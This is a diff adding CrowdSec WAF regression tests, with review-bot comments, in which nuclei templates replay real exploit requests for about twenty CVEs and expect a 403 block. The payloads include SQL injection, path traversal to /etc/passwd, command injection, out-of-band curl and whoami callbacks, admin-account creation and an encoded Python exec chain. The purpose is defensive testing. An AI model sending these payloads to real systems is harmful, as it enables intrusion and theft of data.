diff --git a/.appsec-tests/CVE-2017-9841/CVE-2017-9841.yaml b/.appsec-tests/CVE-2017-9841/CVE-2017-9841.yaml
new file mode 100755
index 00000000000..b529047ba40
--- /dev/null
+++ b/.appsec-tests/CVE-2017-9841/CVE-2017-9841.yaml
@@ -0,0 +1,22 @@
+id: CVE-2017-9841
+info:
+ name: CVE-2017-9841
+ author: crowdsec
+ severity: info
+ description: CVE-2017-9841 testing
+ tags: appsec-testing
+http:
+#this is a dummy request, edit the request(s) to match your needs
+ - raw:
+ - |
+ GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: text/html
+
+
+ cookie-reuse: true
+#test will fail because we won't match http status
+ matchers:
+ - type: status
+ status:
+ - 403
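Review bot: The two scaffold comments in this template, `#this is a dummy request, edit the request(s) to match your needs` and `#test will fail because we won't match http status`, are stale: the request is the real CVE-2017-9841 probe and the 403 matcher is the expected outcome, so both comments now say the opposite of what the test does. The same copied comments appear in the CVE-2019-12989, CVE-2020-11738, CVE-2021-22941, CVE-2021-3129, CVE-2022-44877, CVE-2023-20198, CVE-2023-24489, CVE-2023-33617, CVE-2023-3519, CVE-2023-38205, cve-2023-42793 and vpatch-env-access templates. I would replace them with one line stating the contract, `# expected: the appsec engine blocks this request with a 403`. The placeholder metadata (`severity: info`, `description: CVE-2017-9841 testing`) is harmless for a test but the description could name what is being exercised, e.g. the eval-stdin.php path.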
diff --git a/.appsec-tests/CVE-2017-9841/config.yaml b/.appsec-tests/CVE-2017-9841/config.yaml
new file mode 100644
index 00000000000..a2f4cc65848
--- /dev/null
+++ b/.appsec-tests/CVE-2017-9841/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2017-9841.yaml
+nuclei_template: CVE-2017-9841.yaml
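Review bot: Only three of the per-test config.yaml files (CVE-2019-12989, CVE-2021-3129, CVE-2023-24489) list `./appsec-rules/crowdsecurity/base-config.yaml` before the vpatch rule; the others, starting with this one, load the vpatch rule alone. If the vpatch rules rely on anything set by the base config, the tests that omit it are exercising the rule in a different configuration than a deployed engine would, and the three that include it give no hint why they differ. Either every config should list `- ./appsec-rules/crowdsecurity/base-config.yaml`, or the three that need it should carry a one-line comment saying what in the base config the rule depends on; I cannot tell which from this page since the rule files are not shown.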
diff --git a/.appsec-tests/CVE-2019-12989/CVE-2019-12989.yaml b/.appsec-tests/CVE-2019-12989/CVE-2019-12989.yaml
new file mode 100755
index 00000000000..47b55008723
--- /dev/null
+++ b/.appsec-tests/CVE-2019-12989/CVE-2019-12989.yaml
@@ -0,0 +1,24 @@
+id: CVE-2019-12989
+info:
+ name: CVE-2019-12989
+ author: crowdsec
+ severity: info
+ description: CVE-2019-12989 testing
+ tags: appsec-testing
+http:
+#this is a dummy request, edit the request(s) to match your needs
+ - raw:
+ - |
+ POST /sdwan/nitro/v1/config/get_package_file?action=file_download HTTP/1.1
+ Host: {{Hostname}}
+ SSL_CLIENT_VERIFY: SUCCESS
+ Content-Type: application/json
+ Content-Length: 178
+
+ {"get_package_file": {"site_name": "blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_01234';#","appliance_type": "primary","package_type": "active"}}
+ cookie-reuse: true
+#test will fail because we won't match http status
+ matchers:
+ - type: status
+ status:
+ - 403
diff --git a/.appsec-tests/CVE-2019-12989/config.yaml b/.appsec-tests/CVE-2019-12989/config.yaml
new file mode 100644
index 00000000000..67c49d711b6
--- /dev/null
+++ b/.appsec-tests/CVE-2019-12989/config.yaml
@@ -0,0 +1,4 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/base-config.yaml
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2019-12989.yaml
+nuclei_template: CVE-2019-12989.yaml
diff --git a/.appsec-tests/CVE-2020-11738/CVE-2020-11738.yaml b/.appsec-tests/CVE-2020-11738/CVE-2020-11738.yaml
new file mode 100755
index 00000000000..970cc60edc2
--- /dev/null
+++ b/.appsec-tests/CVE-2020-11738/CVE-2020-11738.yaml
@@ -0,0 +1,20 @@
+id: CVE-2020-11738
+info:
+ name: CVE-2020-11738
+ author: crowdsec
+ severity: info
+ description: CVE-2020-11738 testing
+ tags: appsec-testing
+http:
+#this is a dummy request, edit the request(s) to match your needs
+ - raw:
+ - |
+ GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+#test will fail because we won't match http status
+ matchers:
+ - type: status
+ status:
+ - 403
diff --git a/.appsec-tests/CVE-2020-11738/config.yaml b/.appsec-tests/CVE-2020-11738/config.yaml
new file mode 100644
index 00000000000..455ebdac57f
--- /dev/null
+++ b/.appsec-tests/CVE-2020-11738/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2020-11738.yaml
+nuclei_template: CVE-2020-11738.yaml
diff --git a/.appsec-tests/CVE-2021-22941/CVE-2021-22941.yaml b/.appsec-tests/CVE-2021-22941/CVE-2021-22941.yaml
new file mode 100755
index 00000000000..18028ad2ae1
--- /dev/null
+++ b/.appsec-tests/CVE-2021-22941/CVE-2021-22941.yaml
@@ -0,0 +1,31 @@
+id: CVE-2021-22941
+info:
+ name: CVE-2021-22941
+ author: crowdsec
+ severity: info
+ description: CVE-2021-22941 testing
+ tags: appsec-testing
+http:
+#this is a dummy request, edit the request(s) to match your needs
+ - raw:
+ - |
+ POST /upload.aspx?uploadid=%40using+System.Diagnostics%3B%40%7Bint+idx0%3D+0%3Bstring+str_idx0+%3D+idx0.ToString%28%29%3B+int+idx1+%3D+1%3Bstring+str_idx1+%3D+idx1.ToString%28%29%3Bstring+cmd+%3D+Request.QueryString%5Bstr_idx0%5D%3Bstring+arg+%3D+Request.QueryString%5Bstr_idx1%5D%3BProcess.Start%28cmd%2Carg%29%3B%7D%2F..%2F..%2FConfigService%5CViews%5CShared%5CError.cshtml&bp=123&accountid=123 HTTP/1.1
+ Host: 127.0.0.1:4241
+ User-Agent: python-requests/2.28.2
+ Accept-Encoding: gzip, deflate, br
+ Accept: */*
+ Connection: keep-alive
+ Content-Type: multipart/form-data; boundary=boundary
+ Content-Length: 104
+
+ --boundary
+ Content-Disposition: form-data; name="text4"; filename="text5"
+
+ V8C7BH6OHT
+ --boundary--
+ cookie-reuse: true
+#test will fail because we won't match http status
+ matchers:
+ - type: status
+ status:
+ - 403
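Review bot: This request hard-codes `Host: 127.0.0.1:4241` (and a captured `User-Agent: python-requests/2.28.2`) where every other template on this page uses `Host: {{Hostname}}`. The literal address happens to match `listen_addr` in template_acquis.yaml, but it ties the test to that one port and will silently diverge if the harness is ever run against a different listener. I would change it to `Host: {{Hostname}}` for consistency; the captured User-Agent can stay or go, it does not affect the 403 check as far as this page shows.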
diff --git a/.appsec-tests/CVE-2021-22941/config.yaml b/.appsec-tests/CVE-2021-22941/config.yaml
new file mode 100644
index 00000000000..59865018204
--- /dev/null
+++ b/.appsec-tests/CVE-2021-22941/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2021-22941.yaml
+nuclei_template: CVE-2021-22941.yaml
diff --git a/.appsec-tests/CVE-2021-3129/CVE-2021-3129.yaml b/.appsec-tests/CVE-2021-3129/CVE-2021-3129.yaml
new file mode 100755
index 00000000000..ece8bdd7075
--- /dev/null
+++ b/.appsec-tests/CVE-2021-3129/CVE-2021-3129.yaml
@@ -0,0 +1,30 @@
+id: CVE-2021-3129
+info:
+ name: CVE-2021-3129
+ author: crowdsec
+ severity: info
+ description: CVE-2021-3129 testing
+ tags: appsec-testing
+http:
+ - raw:
+ - |
+ POST /_ignition/execute-solution HTTP/1.1
+ Host: {{Hostname}}
+ Accept: application/json
+ Content-Type: application/json
+
+ {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
+ - |
+ POST /_ignition/execute-solution HTTP/1.1
+ Host: {{Hostname}}
+ Accept: application/json
+ Content-Type: application/json
+
+ {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "phar://../storage/logs/laravel.log/test.txt"}}
+
+ cookie-reuse: true
+#test will fail because we won't match http status
+ matchers:
+ - type: status
+ status:
+ - 403
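Review bot: This test sends two payload variants (the `php://filter` one and the `phar://` one) but keeps a single `type: status` matcher, which, if I recall nuclei's per-response matching correctly, reports a match as soon as either response is a 403. A rule that blocks only the first variant would therefore still pass this test, hiding the gap. The other multi-request tests on this page (CVE-2023-33617, CVE-2023-50164, vpatch-env-access) use the per-request DSL form, so this one should too; note that the `status_code_N` variables need `req-condition: true` on the request block.

```yaml
    # … unchanged: the two raw requests …
    cookie-reuse: true
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 403 && status_code_2 == 403'
```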
diff --git a/.appsec-tests/CVE-2021-3129/config.yaml b/.appsec-tests/CVE-2021-3129/config.yaml
new file mode 100644
index 00000000000..0552429ef9c
--- /dev/null
+++ b/.appsec-tests/CVE-2021-3129/config.yaml
@@ -0,0 +1,4 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/base-config.yaml
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2021-3129.yaml
+nuclei_template: CVE-2021-3129.yaml
diff --git a/.appsec-tests/CVE-2022-27926/CVE-2022-27926.yaml b/.appsec-tests/CVE-2022-27926/CVE-2022-27926.yaml
new file mode 100644
index 00000000000..3b0ceb49ff4
--- /dev/null
+++ b/.appsec-tests/CVE-2022-27926/CVE-2022-27926.yaml
@@ -0,0 +1,19 @@
+id: CVE-2022-27926
+
+info:
+ name: Zimbra Collaboration (ZCS) - Cross Site Scripting
+ author: rootxharsh,iamnoooob,pdresearch
+ severity: medium
+ description: |
+ A reflected cross-site scripting (XSS) vulnerability in the /public/launchNewWindow.jsp component of Zimbra Collaboration (aka ZCS) 9.0 allows unauthenticated attackers to execute arbitrary web script or HTML via request parameters.
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 403
\ No newline at end of file
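Review bot: This template, imported with its upstream `info` block, has no `tags: appsec-testing` entry, unlike the crowdsec-authored templates on this page; the same is true of CVE-2022-35914, CVE-2022-46169, CVE-2023-22515 and CVE-2023-34362. If the harness or the lint script selects templates by that tag, these five are skipped without any failure being reported, which I cannot confirm from here but which is cheap to rule out by adding `tags: appsec-testing` to each. Separately, `matchers-condition: and` with a single matcher is redundant and can be dropped. The file also lacks a trailing newline.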
diff --git a/.appsec-tests/CVE-2022-27926/config.yaml b/.appsec-tests/CVE-2022-27926/config.yaml
new file mode 100644
index 00000000000..f436cbcf62b
--- /dev/null
+++ b/.appsec-tests/CVE-2022-27926/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2022-27926.yaml
+nuclei_template: CVE-2022-27926.yaml
diff --git a/.appsec-tests/CVE-2022-35914/CVE-2022-35914.yaml b/.appsec-tests/CVE-2022-35914/CVE-2022-35914.yaml
new file mode 100644
index 00000000000..1e51d8cf39d
--- /dev/null
+++ b/.appsec-tests/CVE-2022-35914/CVE-2022-35914.yaml
@@ -0,0 +1,26 @@
+id: CVE-2022-35914
+
+info:
+ name: GLPI <=10.0.2 - Remote Command Execution
+ author: For3stCo1d
+ severity: critical
+ description: |
+ GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module.
+variables:
+ cmd: "cat+/etc/passwd"
+
+http:
+ - raw:
+ - |
+ POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: sid=foo
+
+ sid=foo&hhook=exec&text={{cmd}}
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 403
\ No newline at end of file
diff --git a/.appsec-tests/CVE-2022-35914/config.yaml b/.appsec-tests/CVE-2022-35914/config.yaml
new file mode 100644
index 00000000000..19ef93b0fc5
--- /dev/null
+++ b/.appsec-tests/CVE-2022-35914/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2022-35914.yaml
+nuclei_template: CVE-2022-35914.yaml
diff --git a/.appsec-tests/CVE-2022-44877/CVE-2022-44877.yaml b/.appsec-tests/CVE-2022-44877/CVE-2022-44877.yaml
new file mode 100755
index 00000000000..90061b5d77a
--- /dev/null
+++ b/.appsec-tests/CVE-2022-44877/CVE-2022-44877.yaml
@@ -0,0 +1,22 @@
+id: CVE-2022-44877
+info:
+ name: CVE-2022-44877
+ author: crowdsec
+ severity: info
+ description: CVE-2022-44877 testing
+ tags: appsec-testing
+http:
+#this is a dummy request, edit the request(s) to match your needs
+ - raw:
+ - |
+ POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ username=root&password=toor&commit=Login
+ cookie-reuse: true
+#test will fail because we won't match http status
+ matchers:
+ - type: status
+ status:
+ - 403
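Review bot: The payload embeds `{{interactsh-url}}`, which as far as I know makes nuclei provision an out-of-band interactsh session before sending the request; for a WAF-rule regression test that only checks for a 403 this adds an outbound network dependency to CI and a possible slow or failing run when the interactsh server is unreachable. The same placeholder is used in CVE-2022-46169. A fixed placeholder host such as `oob.invalid` (a reserved, non-resolving name) keeps the request shape the rule is meant to match without the external dependency; if the harness runs nuclei with interactsh disabled, a comment saying so would stop the next reader from asking the same question.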
diff --git a/.appsec-tests/CVE-2022-44877/config.yaml b/.appsec-tests/CVE-2022-44877/config.yaml
new file mode 100644
index 00000000000..6aceab8f633
--- /dev/null
+++ b/.appsec-tests/CVE-2022-44877/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2022-44877.yaml
+nuclei_template: CVE-2022-44877.yaml
diff --git a/.appsec-tests/CVE-2022-46169/CVE-2022-46169.yaml b/.appsec-tests/CVE-2022-46169/CVE-2022-46169.yaml
new file mode 100644
index 00000000000..b09f4452c24
--- /dev/null
+++ b/.appsec-tests/CVE-2022-46169/CVE-2022-46169.yaml
@@ -0,0 +1,23 @@
+id: CVE-2022-46169
+
+info:
+ name: Cacti <=1.2.22 - Remote Command Injection
+ author: Hardik-Solanki,j4vaovo
+ severity: critical
+ description: |
+ Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+variables:
+ useragent: '{{rand_base(6)}}'
+
+http:
+ - raw:
+ - |
+ GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=%3Bcurl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'%3B HTTP/1.1
+ Host: {{Hostname}}
+ X-Forwarded-For: 127.0.0.1
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 403
\ No newline at end of file
diff --git a/.appsec-tests/CVE-2022-46169/config.yaml b/.appsec-tests/CVE-2022-46169/config.yaml
new file mode 100644
index 00000000000..8d9e09dd195
--- /dev/null
+++ b/.appsec-tests/CVE-2022-46169/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2022-46169.yaml
+nuclei_template: CVE-2022-46169.yaml
diff --git a/.appsec-tests/CVE-2023-20198/CVE-2023-20198.yaml b/.appsec-tests/CVE-2023-20198/CVE-2023-20198.yaml
new file mode 100755
index 00000000000..05cae5e9a4d
--- /dev/null
+++ b/.appsec-tests/CVE-2023-20198/CVE-2023-20198.yaml
@@ -0,0 +1,39 @@
+id: CVE-2023-20198
+info:
+ name: CVE-2023-20198
+ author: crowdsec
+ severity: info
+ description: CVE-2023-20198 testing
+ tags: appsec-testing
+http:
+ - raw:
+ - |
+ POST /%2577ebui_wsma_https HTTP/1.1
+ Host: {{Hostname}}
+
+
+
+
+
+
+ #{username}
+ *****
+
+
+
+
+
+
+
+
+
+
+
+
+
+ cookie-reuse: true
+#test will fail because we won't match http status
+ matchers:
+ - type: status
+ status:
+ - 403
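Review bot: The request body here is fifteen-odd blank lines around `#{username}` and `*****`, which reads like a redacted placeholder rather than a payload, and nothing in the file says so. If the intent is that the rule is exercised solely by the doubly-encoded `/%2577ebui_wsma_https` path, a comment above the raw block should state it, e.g. `# body is a deliberate placeholder; this test exercises only the double-encoded webui path`; otherwise the blank lines look like an accidental paste. I would also check that the YAML literal block preserves the blank lines the way the harness expects, since a trimmed body would change the request length.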
diff --git a/.appsec-tests/CVE-2023-20198/config.yaml b/.appsec-tests/CVE-2023-20198/config.yaml
new file mode 100644
index 00000000000..db4af629436
--- /dev/null
+++ b/.appsec-tests/CVE-2023-20198/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-20198.yaml
+nuclei_template: CVE-2023-20198.yaml
diff --git a/.appsec-tests/CVE-2023-22515/CVE-2023-22515.yaml b/.appsec-tests/CVE-2023-22515/CVE-2023-22515.yaml
new file mode 100644
index 00000000000..f4d428850ad
--- /dev/null
+++ b/.appsec-tests/CVE-2023-22515/CVE-2023-22515.yaml
@@ -0,0 +1,28 @@
+id: CVE-2023-22515
+info:
+ name: Atlassian Confluence - Privilege Escalation
+ severity: critical
+ author: crowdsec
+ description: |
+ Atlassian Confluence Data Center and Server contains a privilege escalation vulnerability that allows an attacker to create unauthorized Confluence administrator accounts and access Confluence.
+variables:
+ username: "{{rand_base(10)}}"
+ password: "{{rand_base(10)}}"
+ email: "{{username}}@{{password}}"
+
+http:
+ - raw:
+ - |
+ @timeout:20s
+ POST /setup/setupadministrator.action HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ X-Atlassian-Token: no-check
+
+ username={{to_lower(username)}}&fullName=admin&email={{email}}.com&password={{password}}&confirm={{password}}&setup-next-button=Next
+ cookie-reuse: true
+ redirects: true
+ matchers:
+ - type: status
+ status:
+ - 403
\ No newline at end of file
diff --git a/.appsec-tests/CVE-2023-22515/config.yaml b/.appsec-tests/CVE-2023-22515/config.yaml
new file mode 100644
index 00000000000..941b820282e
--- /dev/null
+++ b/.appsec-tests/CVE-2023-22515/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-22515.yaml
+nuclei_template: CVE-2023-22515.yaml
diff --git a/.appsec-tests/CVE-2023-24489/CVE-2023-24489.yaml b/.appsec-tests/CVE-2023-24489/CVE-2023-24489.yaml
new file mode 100755
index 00000000000..69468a5212b
--- /dev/null
+++ b/.appsec-tests/CVE-2023-24489/CVE-2023-24489.yaml
@@ -0,0 +1,31 @@
+id: CVE-2023-24489
+info:
+ name: CVE-2023-24489
+ author: crowdsec
+ severity: info
+ description: CVE-2023-24489 testing
+ tags: appsec-testing
+variables:
+ fileName: '{{rand_base(8)}}'
+ #in real life padding varies to abuse the crypto bug
+ padding: 'QUFBQUFBQUFBQUFBQUFBAEFBQUFBQUFBQUFBQUFBQUE='
+http:
+ - raw:
+ - |
+ POST /documentum/upload.aspx?parentid={{padding}}&raw=1&unzip=on&uploadid={{fileName}}\..\..\..\cifs&filename={{fileName}}.aspx HTTP/1.1
+ Host: {{Hostname}}
+
+ <%@ Page Language="C#" Debug="true" Trace="false" %>
+
+
+ cookie-reuse: true
+#test will fail because we won't match http status
+ matchers:
+ - type: status
+ status:
+ - 403
\ No newline at end of file
diff --git a/.appsec-tests/CVE-2023-24489/config.yaml b/.appsec-tests/CVE-2023-24489/config.yaml
new file mode 100644
index 00000000000..db388766b6e
--- /dev/null
+++ b/.appsec-tests/CVE-2023-24489/config.yaml
@@ -0,0 +1,4 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/base-config.yaml
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-24489.yaml
+nuclei_template: CVE-2023-24489.yaml
diff --git a/.appsec-tests/CVE-2023-33617/CVE-2023-33617.yaml b/.appsec-tests/CVE-2023-33617/CVE-2023-33617.yaml
new file mode 100755
index 00000000000..4894a4eea05
--- /dev/null
+++ b/.appsec-tests/CVE-2023-33617/CVE-2023-33617.yaml
@@ -0,0 +1,40 @@
+id: cve-2023-33617
+info:
+ name: cve-2023-33617
+ author: crowdsec
+ severity: info
+ description: cve-2023-33617 testing
+ tags: appsec-testing
+http:
+#we're testing two requests:
+# 1. login with default creds
+# 2. exploitation of the actual vuln
+# 3. the last one shouldn't match
+ - raw:
+ - |
+ POST /boaform/admin/formLogin HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ username=admin&psd=parks
+ - |
+ POST /boaform/admin/formPing HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ target_addr=1.2.3.4;cat /etc/passwd
+ - |
+ POST /boaform/admin/formPing HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ target_addr=1.2.3.4
+ cookie-reuse: true
+#test will fail because we won't match http status
+ matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - 'status_code_1 == 403'
+ - 'status_code_2 == 403'
+ - 'status_code_3 == 404'
\ No newline at end of file
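Review bot: The comment says `#we're testing two requests:` but then enumerates three, and the third is the benign control case; `#we're testing three requests:` fixes it. More importantly, the DSL matchers reference `status_code_1`/`status_code_2`/`status_code_3`, which as far as I recall nuclei only populates when the request block sets `req-condition: true`; without it the expressions cannot evaluate and the test would fail regardless of the rule. The same applies to CVE-2023-50164 and vpatch-env-access, so please confirm against the nuclei version the harness uses. The expected `status_code_3 == 404` also assumes the test backend answers unknown routes with 404, which is worth a comment since it is a property of the harness, not of the rule.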
diff --git a/.appsec-tests/CVE-2023-33617/config.yaml b/.appsec-tests/CVE-2023-33617/config.yaml
new file mode 100644
index 00000000000..4a7289b5bfa
--- /dev/null
+++ b/.appsec-tests/CVE-2023-33617/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-33617.yaml
+nuclei_template: CVE-2023-33617.yaml
diff --git a/.appsec-tests/CVE-2023-34362/CVE-2023-34362.yaml b/.appsec-tests/CVE-2023-34362/CVE-2023-34362.yaml
new file mode 100644
index 00000000000..6c1ce11f2a5
--- /dev/null
+++ b/.appsec-tests/CVE-2023-34362/CVE-2023-34362.yaml
@@ -0,0 +1,29 @@
+id: CVE-2023-34362
+
+info:
+ name: MOVEit Transfer - Remote Code Execution
+ author: princechaddha,rootxharsh,ritikchaddha,pdresearch
+ severity: critical
+variables:
+ sessioncookie: "{{randstr}}"
+ ips: "127.0.0.1"
+
+http:
+ - raw:
+ - |
+ POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: python-requests/2.26.0
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Ax-silock-transaction: folder_add_by_path
+ X-siLock-Transaction: session_setvars
+ X-siLock-SessVar0: MyPkgID: 0
+ X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('{{sessioncookie}}');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET InstId='1234' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET IpAddress='{{ips}}' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET Timeout='60' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET ResilNode='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET AcctReady='1' WHERE SessionID='{{sessioncookie}}'; -- asdf
+ Cookie: siLockLongTermInstID=0
+ Content-Length: 0
+ matchers:
+ - type: status
+ status:
+ - 403
+
diff --git a/.appsec-tests/CVE-2023-34362/config.yaml b/.appsec-tests/CVE-2023-34362/config.yaml
new file mode 100644
index 00000000000..7035605a2d7
--- /dev/null
+++ b/.appsec-tests/CVE-2023-34362/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-34362.yaml
+nuclei_template: CVE-2023-34362.yaml
diff --git a/.appsec-tests/CVE-2023-3519/CVE-2023-3519.yaml b/.appsec-tests/CVE-2023-3519/CVE-2023-3519.yaml
new file mode 100755
index 00000000000..91fcff6f144
--- /dev/null
+++ b/.appsec-tests/CVE-2023-3519/CVE-2023-3519.yaml
@@ -0,0 +1,20 @@
+id: CVE-2023-3519
+info:
+ name: CVE-2023-3519
+ author: crowdsec
+ severity: info
+ description: CVE-2023-3519 testing
+ tags: appsec-testing
+http:
+#this is a dummy request, edit the request(s) to match your needs
+ - raw:
+ - |
+ GET /gwtest/formssso?event=start&target=DrKQG9NqdhyZwRtgjotDXh3NufqkpYGOSipe6bBUYDaTfAJtcMFoDjBi6UjPMfBxPOicdLS6ODbGeP6qsZOzjzpxCPD1Rzz9OEcKMfKkWbaxDj72jrJgO7NhFYzPHAFrdOuzmpkdSgFG8RtO7bKzUXpLhvwWchkJX1BUoCk0��a�%30%02%00%00%65%78%70%6f%72%74%20%50%41%54%48%3d%2f%76%61%72%2f%70%79%74%68%6f%6e%2f%62%69%6e%3a%24%50%41%54%48%3b%65%63%68%6f%20%65%78%65%63%5c%28%5f%5f%69%6d%70%6f%72%74%5f%5f%5c%28%5c%27%7a%6c%69%62%5c%27%5c%29%2e%64%65%63%6f%6d%70%72%65%73%73%5c%28%5f%5f%69%6d%70%6f%72%74%5f%5f%5c%28%5c%27%62%61%73%65%36%34%5c%27%5c%29%2e%62%36%34%64%65%63%6f%64%65%5c%28%5f%5f%69%6d%70%6f%72%74%5f%5f%5c%28%5c%27%63%6f%64%65%63%73%5c%27%5c%29%2e%67%65%74%65%6e%63%6f%64%65%72%5c%28%5c%27%75%74%66%2d%38%5c%27%5c%29%5c%28%5c%27%65%4e%6f%39%55%45%31%4c%78%44%41%51%50%54%65%2f%49%72%63%6b%47%45%4f%37%31%4b%4b%4c%46%55%51%38%69%49%6a%67%65%68%4f%52%4e%68%6b%31%4e%45%31%43%6b%74%57%71%2b%4e%39%74%79%4f%49%63%5a%6e%67%7a%62%39%35%38%36%4e%6d%37%6b%48%42%30%63%6f%4c%45%76%34%30%65%2b%54%68%45%36%46%6f%65%55%39%6a%4c%78%4a%4f%65%41%62%32%36%67%42%65%73%4c%51%36%44%66%51%50%61%31%47%79%4c%71%68%53%2b%56%6c%2f%46%76%6a%53%4c%45%75%69%47%48%2f%44%75%2f%75%72%32%5a%66%66%34%63%48%31%35%78%7a%4a%50%53%47%63%74%79%45%51%70%61%63%34%32%6f%75%6c%4f%52%62%33%36%6c%76%42%32%4e%5a%59%35%59%34%42%68%51%68%55%73%45%6e%7a%4b%34%6e%6d%36%69%41%62%41%30%78%4f%47%54%46%2b%57%45%6e%76%72%42%7a%6c%52%63%6e%46%44%65%42%51%42%35%41%64%64%42%5a%37%71%5a%36%54%36%41%7a%59%4d%66%62%35%72%41%39%69%41%70%59%71%64%6d%31%56%4f%48%66%31%58%6a%30%75%61%49%56%68%41%30%6e%79%33%55%43%44%64%37%41%50%45%53%4d%73%4c%78%4e%69%31%4f%61%6b%67%4d%2f%6b%50%69%57%51%62%66%78%6e%36%41%79%44%6e%58%7a%51%5c%3d%5c%27%5c%29%5c%5b%30%5c%5d%5c%29%5c%29%5c%29%20%7c%20%65%78%65%63%20%24%28%77%68%69%63%68%20%70%79%74%68%6f%6e%20%7c%7c%20%77%68%69%63%68%20%70%79%74%68%6f%6e%33%20%7c%7c%20%77%68%69%63%68%20%70%79%74%68%6f%6e%32%29%20%2d%00%5f�%02%00%00%00%72%00%5e%48��%40%63�%01%48%81�%00%02%00%00��%48%31�%48%81Ĩ%15%00%00%68%03%24%
78%00� HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
+ cookie-reuse: true
+#test will fail because we won't match http status
+ matchers:
+ - type: status
+ status:
+ - 403
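Review bot: The `target=` value in this request line contains raw non-UTF-8 bytes (rendered here as replacement characters), while the rest of the payload is percent-encoded. YAML requires valid Unicode, so depending on the loader those bytes are either rejected or silently replaced with U+FFFD, which changes the request the rule is tested against without any visible error. I would percent-encode the remaining raw bytes so the whole value is plain ASCII, or, if the rule is meant to key on the oversized `target=` length rather than its exact content, say so in a comment and use a synthetic filler of the same length.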
diff --git a/.appsec-tests/CVE-2023-3519/config.yaml b/.appsec-tests/CVE-2023-3519/config.yaml
